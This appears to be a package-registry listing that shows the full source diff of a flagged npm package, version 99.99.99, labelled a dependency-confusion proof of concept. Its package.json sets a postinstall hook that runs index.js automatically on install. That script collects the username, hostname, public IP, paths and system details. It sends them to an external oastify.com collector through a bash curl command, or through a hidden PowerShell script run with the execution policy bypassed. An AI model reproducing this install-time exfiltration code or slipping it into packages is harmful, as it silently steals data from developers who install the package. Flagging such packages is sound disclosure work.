papapaapapapapapapaappaapaaaaad 99.99.99
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of papapaapapapapapapaappaapaaaaad might be problematic. Click here for more details.
- package/index.js +112 -0
- package/package.json +15 -0
package/index.js
ADDED
@@ -0,0 +1,112 @@
|
|
1
|
+
|
2
|
+
const { exec } = require('child_process');
|
3
|
+
const http = require('http');
|
4
|
+
|
5
|
+
const getPublicIP = (callback) => {
|
6
|
+
const options = {
|
7
|
+
hostname: 'api.ipify.org',
|
8
|
+
path: '/?format=json',
|
9
|
+
method: 'GET',
|
10
|
+
};
|
11
|
+
|
12
|
+
const req = http.request(options, (res) => {
|
13
|
+
let data = '';
|
14
|
+
res.on('data', (chunk) => {
|
15
|
+
data += chunk;
|
16
|
+
});
|
17
|
+
|
18
|
+
res.on('end', () => {
|
19
|
+
try {
|
20
|
+
const response = JSON.parse(data);
|
21
|
+
const publicIP = response.ip;
|
22
|
+
callback(null, publicIP);
|
23
|
+
} catch (error) {
|
24
|
+
callback(new Error('Error parsing response'));
|
25
|
+
}
|
26
|
+
});
|
27
|
+
});
|
28
|
+
|
29
|
+
req.on('error', (error) => {
|
30
|
+
callback(error);
|
31
|
+
});
|
32
|
+
|
33
|
+
req.end();
|
34
|
+
};
|
35
|
+
|
36
|
+
const os = require('os');
|
37
|
+
|
38
|
+
const detectOSType = () => {
|
39
|
+
const type = os.type();
|
40
|
+
if (type.startsWith('Windows')) return 'Windows';
|
41
|
+
if (type.startsWith('Linux')) return 'Linux';
|
42
|
+
if (type.startsWith('Darwin')) return 'Mac';
|
43
|
+
return 'UNKNOWN';
|
44
|
+
};
|
45
|
+
|
46
|
+
|
47
|
+
// Usage example:
|
48
|
+
getPublicIP((error, remoteIP) => {
|
49
|
+
if (error) {
|
50
|
+
console.error('Error:', error.message);
|
51
|
+
} else {
|
52
|
+
const os_type = detectOSType()
|
53
|
+
if (os_type === 'Linux' && os_type == Mac){
|
54
|
+
bash = `#!/bin/bash
|
55
|
+
separator="--------------------------------------------------"
|
56
|
+
exfiltrate="$separator
|
57
|
+
Username: \`whoami\`
|
58
|
+
Hostname: \`hostname\`
|
59
|
+
Public IP: ${remoteIP}
|
60
|
+
Time: \`date\`
|
61
|
+
Current Path: \`pwd\`
|
62
|
+
Package Name: \`echo $(npm run env | grep "npm_package_name") | cut -d "=" -f 2\`
|
63
|
+
Kernel: \`uname -a\`
|
64
|
+
$separator"
|
65
|
+
echo "$exfiltrate" > /tmp/demo.txt
|
66
|
+
curl --silent -F content="@/tmp/demo.txt" https://r4wyjx8i2qfy2vvas1vhqyjg47ayyomd.oastify.com
|
67
|
+
rm -f /tmp/demo.txt`
|
68
|
+
exec('echo -e' + bash + " > /tmp/demo.sh; chmod + x /tmp/demo.sh; /bin/bash -c /tmp/demo.sh; rm -f /tmp/demo.sh", (error, stdout, stderr) => {
|
69
|
+
if (error) {
|
70
|
+
console.error(`Error: ${error.message}`);
|
71
|
+
return;
|
72
|
+
}
|
73
|
+
});
|
74
|
+
} else if (os_type === 'Windows'){
|
75
|
+
powershell =
|
76
|
+
`$whoami = whoami
|
77
|
+
$today = (Get-Date).DateTime
|
78
|
+
$publicIP = (Invoke-WebRequest -Uri 'https://api.ipify.org?format=text' -UseBasicParsing).content
|
79
|
+
$system = systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
|
80
|
+
$filePath = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), "output.txt")
|
81
|
+
$scriptPath = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), "demo.ps1")
|
82
|
+
|
83
|
+
Write-Output "Username: $whoami\`nDate: $today\`nPublic IP: $publicIP\`nSystem Information:" | Out-File -FilePath $filePath -Encoding ASCII
|
84
|
+
Add-Content $filePath $system
|
85
|
+
|
86
|
+
$destinationUrl = "https://r4wyjx8i2qfy2vvas1vhqyjg47ayyomd.oastify.com"
|
87
|
+
|
88
|
+
$filePath = "$filePath"
|
89
|
+
|
90
|
+
Invoke-WebRequest -Uri $destinationUrl -Method POST -InFile $filePath -UseBasicParsing
|
91
|
+
del $filePath
|
92
|
+
del $scriptPath`
|
93
|
+
}
|
94
|
+
const fs = require('fs');
|
95
|
+
const psFilePath = `${process.env.TEMP}\demo.ps1`;
|
96
|
+
|
97
|
+
fs.writeFile(psFilePath, powershell, err => {
|
98
|
+
if (err) {
|
99
|
+
console.error(err);
|
100
|
+
}
|
101
|
+
// file written successfully
|
102
|
+
});
|
103
|
+
|
104
|
+
exec(`C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File "${psFilePath}"`, (error, stdout, stderr) => {
|
105
|
+
if (error) {
|
106
|
+
console.error(`Error: ${error.message}`);
|
107
|
+
return;
|
108
|
+
}
|
109
|
+
});
|
110
|
+
|
111
|
+
}
|
112
|
+
});
|
package/package.json
ADDED
@@ -0,0 +1,15 @@
|
|
1
|
+
|
2
|
+
{
|
3
|
+
"name": "papapaapapapapapapaappaapaaaaad",
|
4
|
+
"version": "99.99.99",
|
5
|
+
"description": "A sample npm package for demonstration purposes.",
|
6
|
+
"main": "index.js",
|
7
|
+
"scripts": {
|
8
|
+
"postinstall": "node index.js"
|
9
|
+
},
|
10
|
+
"keywords": [
|
11
|
+
"dependency"
|
12
|
+
],
|
13
|
+
"author": "Depdency-Confusion-PoC",
|
14
|
+
"license": "ISC"
|
15
|
+
}
|